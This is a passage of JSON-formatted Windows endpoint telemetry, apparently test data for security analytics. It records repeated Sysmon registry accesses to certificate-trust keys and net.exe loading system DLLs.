"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "vmhgfs.dll", + "image_path": "C:\\Windows\\System32\\vmhgfs.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 
"timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "drprov.dll", + "image_path": "C:\\Windows\\System32\\drprov.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909490000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "winsta.dll", + "image_path": "C:\\Windows\\System32\\winsta.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "ntlanman.dll", + "image_path": "C:\\Windows\\System32\\ntlanman.dll", + "pid": 6292, + "process_name": 
"net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + 